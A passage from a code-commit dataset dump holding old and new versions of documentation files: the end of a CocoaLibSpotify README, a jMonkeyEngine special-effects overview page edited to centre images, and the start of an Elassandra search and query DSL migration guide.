GitHub page for known issues and discussion. Otherwise, we may be available in irc:\/\/irc.freenode.net\/spotify. ","old_contents":"CocoaLibSpotify\n===============\n\nCocoaLibSpotify is an Objective-C wrapper around our libspotify library. It provides easy access to libspotify's features in a friendly, KVC\/O compliant Objective-C wrapper.\n\n*IMPORTANT:* When checking out CocoaLibSpotify, please run a +git submodule update --init+ before trying to build the sample projects.\n\nBuilding - Mac OS X\n====================\n\nThe Xcode project was built in Xcode 4.0, but should also work fine in Xcode 3.2.x.\n\nCocoaLibSpotify requires libspotify.framework, which isn't included in the repository. The Xcode project includes a build step to download and unpack it from developer.spotify.com automatically. If this fails for some reason, download it manually from developer.spotify.com and unpack it into the project folder.\n\nThe built CocoaLibSpotify.framework contains libspotify.framework as a child framework. Sometimes, Xcode gives build errors complaining it can't find <libspotify\/api.h>. If you get this, manually add the directory CocoaLibSpotify.framework is in to your project's \"Framework Search Paths\" build setting.\n\nBuilding - iOS\n==============\n\nAt the moment, the easiest way to build CocoaLibSpotify on iOS is to include all of the files in the \"common\" directory directory in your project. When you need to use CocoaLibSpotify, include the following header file and you'll have everything you need imported:\n\n#import \"CocoaLibSpotify.h\"\n\nOf course, you need to include libspotify in your project too. Simply download the archives from http:\/\/developer.spotify.com\/ and include the library and api.h file in your project.\n\nDocumentation\n=============\n\nThe headers of CocoaLibSpotify are well documented, and we've provided an Xcode DocSet to provide documentation right in Xcode. With these and the sample projects, you should have everything you need to dive right in!\n\nContact\n=======\n\nIf you have any problems or find any bugs, see our GitHub page for known issues and discussion. Otherwise, we may be available in irc:\/\/irc.freenode.net\/spotify. ","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c4f5112d4910c13d7e904093e83dcaaccb1ee0cb","subject":"center test","message":"center test\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/core\/pages\/effect\/effects_overview.adoc","new_file":"docs\/modules\/core\/pages\/effect\/effects_overview.adoc","new_contents":"= jME3 Special Effects Overview\n:revnumber: 2.1\n:revdate: 2020\/07\/22\n:keywords: documentation, effect, light, water\n:uri-jmonkeyengine: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/tree\/master\/\n:img-jmonkeyengine: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/raw\/master\/\n:uri-forum: https:\/\/hub.jmonkeyengine.org\/\n\n\n\njME3 supports several types of special effects: Post-Processor Filters, SceneProcessors, and Particle Emitters (also known as particle systems). This list contains screenshots and links to sample code that demonstrates how to add the effect to a scene.\n\n\n\n== Sample Code\n\n* There is one `com.jme3.effect.ParticleEmitter` class for all Particle Systems.\n* There is one `com.jme3.post.FilterPostProcessor` class and several `com.jme3.post.filters.` (all Filters have `Filter` in their names).\n* There are several `SceneProcessor` classes in various packages, including e.g. `com.jme3.shadow.` and `com.jme3.water.` (SceneProcessor have `Processor` or `Renderer` in their names).\n\n\n=== Particle Emitter\n\n[source,java]\n----\n\npublic class MyGame extends SimpleApplication {\n public void simpleInitApp() {\n ParticleEmitter pm = new ParticleEmitter(\"my particle effect\", Type.Triangle, 60);\n Material pmMat = new Material(assetManager, \"Common\/MatDefs\/Misc\/Particle.j3md\");\n pmMat.setTexture(\"Texture\", assetManager.loadTexture(\"Effects\/spark.png\"));\n pm.setMaterial(pmMat);\n pm.setImagesX(1);\n pm.setImagesY(1);\n rootNode.attachChild(pm); \/\/ attach one or more emitters to any node\n }\n}\n\n----\n\n\n=== Scene Processor\n\n[source,java]\n----\n\npublic class MyGame extends SimpleApplication {\n private BasicShadowRenderer bsr;\n\n public void simpleInitApp() {\n bsr = new BasicShadowRenderer(assetManager, 1024);\n bsr.setDirection(new Vector3f(.3f, -0.5f, -0.5f));\n viewPort.addProcessor(bsr); \/\/ add one or more sceneprocessor to viewport\n }\n...\n}\n----\n\n\n\n=== Post-Processor Filter\n\n[source,java]\n----\n\npublic class MyGame extends SimpleApplication {\n private FilterPostProcessor fpp; \/\/ one FilterPostProcessor per app\n private SomeFilter sf; \/\/ one or more Filters per app\n\n public void simpleInitApp() {\n fpp = new FilterPostProcessor(assetManager);\n viewPort.addProcessor(fpp); \/\/ add one FilterPostProcessor to viewPort\n\n sf = new SomeFilter();\n fpp.addFilter(sf); \/\/ add one or more Filters to FilterPostProcessor\n }\n...\n}\n----\n\n\n\n== Water\n\n[.float-group]\n--\n[.center]\nimage:effect\/water-post.png[water-post.png,width=\"150\",height=\"100\"]\nimage:effect\/water.png[water.png,width=\"150\",height=\"100\"]\nimage:effect\/water-reflection-muddy.png[water-reflection-muddy.png,width=\"150\",height=\"100\"]\nimage:effect\/underwater2.jpg[underwater2.jpg,width=\"150\",height=\"100\"]\n--\nThe jMonkeyEngine xref:jme3\/advanced\/water.adoc[\"`SeaMonkey WaterFilter`\"] simulates ocean waves, foam, including cool underwater caustics. +\nUse the SimpleWaterProcessor (SceneProcessor) for small, limited bodies of water, such as puddles, drinking troughs, pools, fountains.\n\nSee also:\n\n* link:{uri-forum}t\/monkeys-at-the-beach\/15000[Rendering Water as Post-Process Effect] announcement with video.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestSceneWater.java[TestSceneWater.java] \u2013 SimpleWaterProcessor. (SceneProcessor)\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestSimpleWater.java[TestSimpleWater.java] \u2013 SimpleWaterProcessor. (SceneProcessor)\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestPostWater.java[TestPostWater.java] \u2013 WaterFilter.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestPostWaterLake.java[TestPostWaterLake.java] \u2013 WaterFilter.\n\n\n== Environment Effects\n\n=== Depth of Field Blur\n\nimage:effect\/dof-blur.png[dof-blur.png,width=\"150\",height=\"100\"]\nimage:effect\/light-scattering-filter.png[light-scattering-filter.png,width=\"150\",height=\"100\"]\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestDepthOfField.java[TestDepthOfField.java] \u2013 DepthOfFieldFilter.\n\n\n=== Fog\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestFog.java[TestFog.java] \u2013 FogFilter.\n\n\n\n=== Light Scattering\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestLightScattering.java[TestLightScattering.java] \u2013 LightScatteringFilter.\n\n\n\n=== Vegetation\n\n* Contribution: xref:jme3\/contributions\/vegetationsystem\/grass.adoc[Grass System]\n* Contribution: {uri-forum}t\/generating-vegetation-paged-geometry-style\/18928[Trees (WIP)]\n\n\n\n== Light and Shadows\n\n\n\n=== Bloom and Glow\n\nimage:effect\/tanlglow1.png[tanlglow1.png,width=\"150\",height=\"100\"]\nimage:effect\/shadow-sponza-ssao.png[shadow-sponza-ssao.png,width=\"150\",height=\"100\"]\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestBloom.java[TestBloom.java]\n* More details: xref:jme3\/advanced\/bloom_and_glow.adoc[Bloom and Glow] \u2013 BloomFilter.\n\n\n\n=== Light\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestSimpleLighting.java[TestSimpleLighting.java] \u2013 DirectionalLight, PointLight.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestLightRadius.java[TestLightRadius.java] \u2013 DirectionalLight, PointLight.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestManyLights.java[TestManyLights.java] \u2013 .j3o scene.\n* More details: xref:jme3\/advanced\/light_and_shadow.adoc[Light and Shadow]\n\n\n\n=== Shadow\n\nimage:effect\/shadow.png[shadow.png,width=\"150\",height=\"100\"]\nimage:light\/light-sources.png[light-sources.png,width=\"150\",height=\"100\"]\n\n\/\/* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestShadow.java[TestShadow.java] \u2013 BasicShadowRenderer. (SceneProcessor)\n\/\/* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestPssmShadow.java[TestPssmShadow.java] \u2013 PssmShadowRenderer (SceneProcessor), also known as Parallel-Split Shadow Mapping (PSSM).\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestSSAO.java[TestSSAO.java], link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestSSAO2.java[TestSSAO2.java] \u2013 SSAOFilter, also known as Screen-Space Ambient Occlusion shadows (SSOA).\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestTransparentSSAO.java[TestTransparentSSAO.java] \u2013 SSAOFilter, also known as Screen-Space Ambient Occlusion shadows (SSOA), plus transparancy.\n* More details: xref:jme3\/advanced\/light_and_shadow.adoc[Light and Shadow]\n\n\n\n== Special: Glass, Metal, Dissolve, Toon\n\n\n\n=== Toon Effect\n\nimage:effect\/toon-dino.png[toon-dino.png,width=\"150\",height=\"100\"]\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestCartoonEdge.java[TestCartoonEdge.java] \u2013 CartoonEdgeFilter.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestTransparentCartoonEdge.java[TestTransparentCartoonEdge.java] \u2013 CartoonEdgeFilter.\n\n\n\n=== Fade in \/ Fade out\n\n* xref:jme3\/advanced\/fade.adoc[Fade] \u2013 FadeFilter\n\n\n\n=== User Contributed\n\nimage:effect\/shaderblow_light1.jpg[shaderblow_light1.jpg,width=\"78\",height=\"150\"]\nimage:effect\/shaderblow_glass.jpg[shaderblow_glass.jpg,width=\"80\",height=\"150\"]\nimage:sdk:plugin\/shaderblow_matcap.jpg[shaderblow_matcap.jpg,width=\"150\",height=\"150\"]\nimage:effect\/shaderblow_light2.jpg[shaderblow_light2.jpg,width=\"66\",height=\"150\"]\n\nxref:sdk:plugin\/shaderblow.adoc[ShaderBlow - GLSL Shader Library]\n\n* LightBlow Shader \u2013 blend material texture maps.\n* FakeParticleBlow Shader \u2013 jet, fire effect.\n* ToonBlow Shader \u2013 Toon Shading, toon edges.\n* Dissolve Shader \u2013 Scifi teleportation\/dissolve effect.\n* MatCap Shader \u2013 Gold, metals, glass, toons\u2026!\n* Glass Shader \u2013 Glass.\n* Force Shield Shader \u2013 Scifi impact-on-force-field effect.\n* SimpleSprite Shader \u2013 Animated textures.\n* SimpleSpriteParticle Shader \u2013 Sprite library.\n* MovingTexture Shader \u2013 Animated cloud\/mist texture.\n* SoftParticles Shader \u2013 Fire, clouds, smoke etc.\n* Displace Shader \u2013 Deformation effect: Ripple, wave, pulse, swell!\n\nThanks for your awesome contributions! Keep them coming!\n\n\n\n== Particle Emitters: Explosions, Fire, Smoke\n\nimage:effect\/explosion-5.png[explosion-5.png,width=\"150\",height=\"100\"]\nimage:effect\/particle.png[particle.png,width=\"150\",height=\"100\"]\n\nxref:jme3\/advanced\/particle_emitters.adoc[Particle emitter effects] are highly configurable and can have any texture. They can simulate smoke, dust, leaves, meteors, snowflakes, mosquitos, fire, explosions, clusters, embers, sparks\u2026\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/effect\/TestExplosionEffect.java[TestExplosionEffect.java] \u2013 debris, flame, flash, shockwave, smoke, sparks.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/effect\/TestPointSprite.java[TestPointSprite.java] \u2013 cluster of points.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/effect\/TestMovingParticle.java[TestMovingParticle.java] \u2013 dust, smoke.\n\n\n=== Creating your own Filters\n\nHere is an extract taken from @nehon in the forum thread (link:{uri-forum}t\/how-exactly-do-filters-work\/26871[http:\/\/hub.jmonkeyengine.org\/forum\/topic\/how-exactly-do-filters-work\/])\n\nThe methods are called in this order (pretty much the same flow as processors):\n- initFilter() is called once when the FilterPostPorcessor is initialized or when the filter is added to the processor and this one as already been initialized.\n\nfor each frame the methods are called in that sequence :\n- preFrame() occurs before anything happens\n- postQueue() occcurs once the queues have been populated (there is one queue per bucket and 2 additional queues for the shadows, casters and recievers). Note that geometries in the queues are the one in the view frustum.\n- postFrame occurs once the main frame has been rendered (the back buffer)\n\nThose methods are optional in a filter, they are only there if you want to hook in the rendering process.\n\nThe material variable is here for convenience. You have a getMaterial method that returns the material that\u2019s gonna be used to render the full screen quad. It just happened that in every implementation I had a material attribute in all my sub-classes, so I just put it back in the abstract class. Most of the time getMaterial returns this attribute.\n\nForced-technique can be any technique really, they are more related with the material system than to the filters but anyway. When you use a forced technique the renderer tries to select it on the material of each geometry, if the technique does not exists for the material the geometry is not rendered.\nYou assume well about the SSAO filer, the normal of the scene are rendered to a texture in a pre pass.\n\nPasses : these are filters in filters in a way. First they are a convenient way to initialize a FrameBuffer and the associated textures it needs, then you can use them for what ever you want.\nFor example, a Pass can be (as in the SSAO filter) an extra render of the scene with a forced technique, and you have to handle the render yourself in the postQueue method.\nIt can be a post pass to do after the main filter has been rendered to screen (for example an additional blur pass used in SSAO again). You have a list of passes called postRenderPass in the Filter abstract class. If you add a pass to this list, it\u2019ll be automatically rendered by the FilterPostProcessor during the filter chain.\n\nThe bloom Filter does an intensive use of passes.\n\nFilters in a nutshell.\n\nSee also:\n\n* xref:jme3\/advanced\/particle_emitters.adoc[Particle Emitters]\n* xref:jme3\/advanced\/bloom_and_glow.adoc[Bloom and Glow]\n* link:http:\/\/www.smashingmagazine.com\/2008\/08\/07\/50-photoshop-tutorials-for-sky-and-space-effects\/[Photoshop Tutorial for Sky and space effects (article)]\n","old_contents":"= jME3 Special Effects Overview\n:revnumber: 2.1\n:revdate: 2020\/07\/22\n:keywords: documentation, effect, light, water\n:uri-jmonkeyengine: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/tree\/master\/\n:img-jmonkeyengine: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/raw\/master\/\n:uri-forum: https:\/\/hub.jmonkeyengine.org\/\n\n\n\njME3 supports several types of special effects: Post-Processor Filters, SceneProcessors, and Particle Emitters (also known as particle systems). This list contains screenshots and links to sample code that demonstrates how to add the effect to a scene.\n\n\n\n== Sample Code\n\n* There is one `com.jme3.effect.ParticleEmitter` class for all Particle Systems.\n* There is one `com.jme3.post.FilterPostProcessor` class and several `com.jme3.post.filters.` (all Filters have `Filter` in their names).\n* There are several `SceneProcessor` classes in various packages, including e.g. `com.jme3.shadow.` and `com.jme3.water.` (SceneProcessor have `Processor` or `Renderer` in their names).\n\n\n=== Particle Emitter\n\n[source,java]\n----\n\npublic class MyGame extends SimpleApplication {\n public void simpleInitApp() {\n ParticleEmitter pm = new ParticleEmitter(\"my particle effect\", Type.Triangle, 60);\n Material pmMat = new Material(assetManager, \"Common\/MatDefs\/Misc\/Particle.j3md\");\n pmMat.setTexture(\"Texture\", assetManager.loadTexture(\"Effects\/spark.png\"));\n pm.setMaterial(pmMat);\n pm.setImagesX(1);\n pm.setImagesY(1);\n rootNode.attachChild(pm); \/\/ attach one or more emitters to any node\n }\n}\n\n----\n\n\n=== Scene Processor\n\n[source,java]\n----\n\npublic class MyGame extends SimpleApplication {\n private BasicShadowRenderer bsr;\n\n public void simpleInitApp() {\n bsr = new BasicShadowRenderer(assetManager, 1024);\n bsr.setDirection(new Vector3f(.3f, -0.5f, -0.5f));\n viewPort.addProcessor(bsr); \/\/ add one or more sceneprocessor to viewport\n }\n...\n}\n----\n\n\n\n=== Post-Processor Filter\n\n[source,java]\n----\n\npublic class MyGame extends SimpleApplication {\n private FilterPostProcessor fpp; \/\/ one FilterPostProcessor per app\n private SomeFilter sf; \/\/ one or more Filters per app\n\n public void simpleInitApp() {\n fpp = new FilterPostProcessor(assetManager);\n viewPort.addProcessor(fpp); \/\/ add one FilterPostProcessor to viewPort\n\n sf = new SomeFilter();\n fpp.addFilter(sf); \/\/ add one or more Filters to FilterPostProcessor\n }\n...\n}\n----\n\n\n\n== Water\n\n[.center]\nimage:effect\/water-post.png[water-post.png,width=\"150\",height=\"100\",align=\"center\"]\nimage:effect\/water.png[water.png,width=\"150\",height=\"100\",align=\"center\"]\nimage:effect\/water-reflection-muddy.png[water-reflection-muddy.png,width=\"150\",height=\"100\",align=\"center\"]\nimage:effect\/underwater2.jpg[underwater2.jpg,width=\"150\",height=\"100\",align=\"center\"]\n\nThe jMonkeyEngine xref:jme3\/advanced\/water.adoc[\"`SeaMonkey WaterFilter`\"] simulates ocean waves, foam, including cool underwater caustics. +\nUse the SimpleWaterProcessor (SceneProcessor) for small, limited bodies of water, such as puddles, drinking troughs, pools, fountains.\n\nSee also:\n\n* link:{uri-forum}t\/monkeys-at-the-beach\/15000[Rendering Water as Post-Process Effect] announcement with video.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestSceneWater.java[TestSceneWater.java] \u2013 SimpleWaterProcessor. (SceneProcessor)\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestSimpleWater.java[TestSimpleWater.java] \u2013 SimpleWaterProcessor. (SceneProcessor)\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestPostWater.java[TestPostWater.java] \u2013 WaterFilter.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestPostWaterLake.java[TestPostWaterLake.java] \u2013 WaterFilter.\n\n\n== Environment Effects\n\n=== Depth of Field Blur\n\nimage:effect\/dof-blur.png[dof-blur.png,width=\"150\",height=\"100\"]\nimage:effect\/light-scattering-filter.png[light-scattering-filter.png,width=\"150\",height=\"100\"]\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestDepthOfField.java[TestDepthOfField.java] \u2013 DepthOfFieldFilter.\n\n\n=== Fog\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestFog.java[TestFog.java] \u2013 FogFilter.\n\n\n\n=== Light Scattering\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestLightScattering.java[TestLightScattering.java] \u2013 LightScatteringFilter.\n\n\n\n=== Vegetation\n\n* Contribution: xref:jme3\/contributions\/vegetationsystem\/grass.adoc[Grass System]\n* Contribution: {uri-forum}t\/generating-vegetation-paged-geometry-style\/18928[Trees (WIP)]\n\n\n\n== Light and Shadows\n\n\n\n=== Bloom and Glow\n\nimage:effect\/tanlglow1.png[tanlglow1.png,width=\"150\",height=\"100\"]\nimage:effect\/shadow-sponza-ssao.png[shadow-sponza-ssao.png,width=\"150\",height=\"100\"]\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestBloom.java[TestBloom.java]\n* More details: xref:jme3\/advanced\/bloom_and_glow.adoc[Bloom and Glow] \u2013 BloomFilter.\n\n\n\n=== Light\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestSimpleLighting.java[TestSimpleLighting.java] \u2013 DirectionalLight, PointLight.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestLightRadius.java[TestLightRadius.java] \u2013 DirectionalLight, PointLight.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestManyLights.java[TestManyLights.java] \u2013 .j3o scene.\n* More details: xref:jme3\/advanced\/light_and_shadow.adoc[Light and Shadow]\n\n\n\n=== Shadow\n\nimage:effect\/shadow.png[shadow.png,width=\"150\",height=\"100\"]\nimage:light\/light-sources.png[light-sources.png,width=\"150\",height=\"100\"]\n\n\/\/* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestShadow.java[TestShadow.java] \u2013 BasicShadowRenderer. (SceneProcessor)\n\/\/* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestPssmShadow.java[TestPssmShadow.java] \u2013 PssmShadowRenderer (SceneProcessor), also known as Parallel-Split Shadow Mapping (PSSM).\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestSSAO.java[TestSSAO.java], link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestSSAO2.java[TestSSAO2.java] \u2013 SSAOFilter, also known as Screen-Space Ambient Occlusion shadows (SSOA).\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestTransparentSSAO.java[TestTransparentSSAO.java] \u2013 SSAOFilter, also known as Screen-Space Ambient Occlusion shadows (SSOA), plus transparancy.\n* More details: xref:jme3\/advanced\/light_and_shadow.adoc[Light and Shadow]\n\n\n\n== Special: Glass, Metal, Dissolve, Toon\n\n\n\n=== Toon Effect\n\nimage:effect\/toon-dino.png[toon-dino.png,width=\"150\",height=\"100\"]\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestCartoonEdge.java[TestCartoonEdge.java] \u2013 CartoonEdgeFilter.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestTransparentCartoonEdge.java[TestTransparentCartoonEdge.java] \u2013 CartoonEdgeFilter.\n\n\n\n=== Fade in \/ Fade out\n\n* xref:jme3\/advanced\/fade.adoc[Fade] \u2013 FadeFilter\n\n\n\n=== User Contributed\n\nimage:effect\/shaderblow_light1.jpg[shaderblow_light1.jpg,width=\"78\",height=\"150\"]\nimage:effect\/shaderblow_glass.jpg[shaderblow_glass.jpg,width=\"80\",height=\"150\"]\nimage:sdk:plugin\/shaderblow_matcap.jpg[shaderblow_matcap.jpg,width=\"150\",height=\"150\"]\nimage:effect\/shaderblow_light2.jpg[shaderblow_light2.jpg,width=\"66\",height=\"150\"]\n\nxref:sdk:plugin\/shaderblow.adoc[ShaderBlow - GLSL Shader Library]\n\n* LightBlow Shader \u2013 blend material texture maps.\n* FakeParticleBlow Shader \u2013 jet, fire effect.\n* ToonBlow Shader \u2013 Toon Shading, toon edges.\n* Dissolve Shader \u2013 Scifi teleportation\/dissolve effect.\n* MatCap Shader \u2013 Gold, metals, glass, toons\u2026!\n* Glass Shader \u2013 Glass.\n* Force Shield Shader \u2013 Scifi impact-on-force-field effect.\n* SimpleSprite Shader \u2013 Animated textures.\n* SimpleSpriteParticle Shader \u2013 Sprite library.\n* MovingTexture Shader \u2013 Animated cloud\/mist texture.\n* SoftParticles Shader \u2013 Fire, clouds, smoke etc.\n* Displace Shader \u2013 Deformation effect: Ripple, wave, pulse, swell!\n\nThanks for your awesome contributions! Keep them coming!\n\n\n\n== Particle Emitters: Explosions, Fire, Smoke\n\nimage:effect\/explosion-5.png[explosion-5.png,width=\"150\",height=\"100\"]\nimage:effect\/particle.png[particle.png,width=\"150\",height=\"100\"]\n\nxref:jme3\/advanced\/particle_emitters.adoc[Particle emitter effects] are highly configurable and can have any texture. They can simulate smoke, dust, leaves, meteors, snowflakes, mosquitos, fire, explosions, clusters, embers, sparks\u2026\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/effect\/TestExplosionEffect.java[TestExplosionEffect.java] \u2013 debris, flame, flash, shockwave, smoke, sparks.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/effect\/TestPointSprite.java[TestPointSprite.java] \u2013 cluster of points.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/effect\/TestMovingParticle.java[TestMovingParticle.java] \u2013 dust, smoke.\n\n\n=== Creating your own Filters\n\nHere is an extract taken from @nehon in the forum thread (link:{uri-forum}t\/how-exactly-do-filters-work\/26871[http:\/\/hub.jmonkeyengine.org\/forum\/topic\/how-exactly-do-filters-work\/])\n\nThe methods are called in this order (pretty much the same flow as processors):\n- initFilter() is called once when the FilterPostPorcessor is initialized or when the filter is added to the processor and this one as already been initialized.\n\nfor each frame the methods are called in that sequence :\n- preFrame() occurs before anything happens\n- postQueue() occcurs once the queues have been populated (there is one queue per bucket and 2 additional queues for the shadows, casters and recievers). Note that geometries in the queues are the one in the view frustum.\n- postFrame occurs once the main frame has been rendered (the back buffer)\n\nThose methods are optional in a filter, they are only there if you want to hook in the rendering process.\n\nThe material variable is here for convenience. You have a getMaterial method that returns the material that\u2019s gonna be used to render the full screen quad. It just happened that in every implementation I had a material attribute in all my sub-classes, so I just put it back in the abstract class. Most of the time getMaterial returns this attribute.\n\nForced-technique can be any technique really, they are more related with the material system than to the filters but anyway. When you use a forced technique the renderer tries to select it on the material of each geometry, if the technique does not exists for the material the geometry is not rendered.\nYou assume well about the SSAO filer, the normal of the scene are rendered to a texture in a pre pass.\n\nPasses : these are filters in filters in a way. First they are a convenient way to initialize a FrameBuffer and the associated textures it needs, then you can use them for what ever you want.\nFor example, a Pass can be (as in the SSAO filter) an extra render of the scene with a forced technique, and you have to handle the render yourself in the postQueue method.\nIt can be a post pass to do after the main filter has been rendered to screen (for example an additional blur pass used in SSAO again). You have a list of passes called postRenderPass in the Filter abstract class. If you add a pass to this list, it\u2019ll be automatically rendered by the FilterPostProcessor during the filter chain.\n\nThe bloom Filter does an intensive use of passes.\n\nFilters in a nutshell.\n\nSee also:\n\n* xref:jme3\/advanced\/particle_emitters.adoc[Particle Emitters]\n* xref:jme3\/advanced\/bloom_and_glow.adoc[Bloom and Glow]\n* link:http:\/\/www.smashingmagazine.com\/2008\/08\/07\/50-photoshop-tutorials-for-sky-and-space-effects\/[Photoshop Tutorial for Sky and space effects (article)]\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"4673ee7e7737be92edee3901593bcecd7b320b6d","subject":"Minor edit","message":"Minor edit","repos":"strapdata\/elassandra,strapdata\/elassandra,vroyer\/elasticassandra,vroyer\/elasticassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elasticassandra,vroyer\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/migration\/migrate_6_0\/search.asciidoc","new_file":"docs\/reference\/migration\/migrate_6_0\/search.asciidoc","new_contents":"[[breaking_60_search_changes]]\n=== Search and Query DSL changes\n\n==== Changes to queries\n\n* The `collect_payloads` parameter of the `span_near` query has been removed. Payloads will be\n loaded when needed.\n\n* Queries on boolean fields now strictly parse boolean-like values. This means\n only the strings `\"true\"` and `\"false\"` will be parsed into their boolean\n counterparts. Other strings will cause an error to be thrown.\n\n* The `in` query (a synonym for the `terms` query) has been removed\n\n* The `geo_bbox` query (a synonym for the `geo_bounding_box` query) has been removed\n\n* The `mlt` query (a synonym for the `more_like_this` query) has been removed.\n\n* The deprecated `like_text`, `ids` and `docs` parameters (all synonyms for `like`) of the `more_like_this` query have\nbeen removed. Also the deprecated `min_word_len` (a synonym for `min_word_length`) and `max_word_len` \n(a synonym for `max_word_length`) have been removed.\n\n* The `fuzzy_match` and `match_fuzzy` query (synonyma for the `match` query) have been removed\n\n* The `terms` query now always returns scores equal to `1` and is not subject to\n `indices.query.bool.max_clause_count` anymore.\n\n* The deprecated `indices` query has been removed.\n\n* Support for empty query objects (`{ }`) has been removed from the query DSL.\n An error is thrown whenever an empty query object is provided.\n\n* The deprecated `minimum_number_should_match` parameter in the `bool` query has\n been removed, use `minimum_should_match` instead.\n\n* The `query_string` query now correctly parses the maximum number of\n states allowed when\n \"https:\/\/en.wikipedia.org\/wiki\/Powerset_construction#Complexity[determinizing]\"\n a regex as `max_determinized_states` instead of the typo\n `max_determined_states`.\n\n* The `query_string` query no longer accepts `enable_position_increment`, use\n `enable_position_increments` instead.\n\n* For `geo_distance` queries, sorting, and aggregations the `sloppy_arc` option\n has been removed from the `distance_type` parameter.\n\n* The `geo_distance_range` query, which was deprecated in 5.0, has been removed.\n\n* The `optimize_bbox` parameter has been removed from `geo_distance` queries.\n\n* The `ignore_malformed` and `coerce` parameters have been removed from\n `geo_bounding_box`, `geo_polygon`, and `geo_distance` queries.\n\n* The `disable_coord` parameter of the `bool` and `common_terms` queries has\n been removed. If provided, it will be ignored and issue a deprecation warning.\n\n* The `template` query has been removed. This query was deprecated since 5.0\n\n* The `percolate` query's `document_type` has been deprecated. From 6.0 and later\n it is no longer required to specify the `document_type` parameter.\n\n* The `split_on_whitespace` parameter for the `query_string` query has been removed.\n If provided, it will be ignored and issue a deprecation warning.\n The `query_string` query now splits on operator only.\n\n* The `use_dis_max` parameter for the `query_string` query has been removed.\n If provided, it will be ignored and issue a deprecation warning.\n The `tie_breaker` parameter must be used instead.\n\n* The `auto_generate_phrase_queries` parameter for the `query_string` query has been removed,\n use an explicit quoted query instead.\n If provided, it will be ignored and issue a deprecation warning.\n\n* The `all_fields` parameter for the `query_string` has been removed.\n Set `default_field` to *` instead.\n If provided, `default_field` will be automatically set to `*`\n\n* The `index` parameter in the terms filter, used to look up terms in a dedicated index is\n now mandatory. Previously, the index defaulted to the index the query was executed on. Now this index\n must be explicitly set in the request.\n\n* The deprecated `type` and `slop` parameter for the `match` query have been removed. Instead of\nsetting the `type`, the `match_phrase` or `match_phrase_prefix` should be used. The `slop` removed from\nthe `match` query but is supported for `match_phrase` and `match_phrase_prefix`.\n\n* The deprecated `phrase_slop` parameter (a synonym for the `slop` parameter) of the `match_phrase` query has been removed.\n\n* The deprecated `query` parameter (a synonym for the `filter` parameter) of the `constant_score` query has been removed.\n\n* The 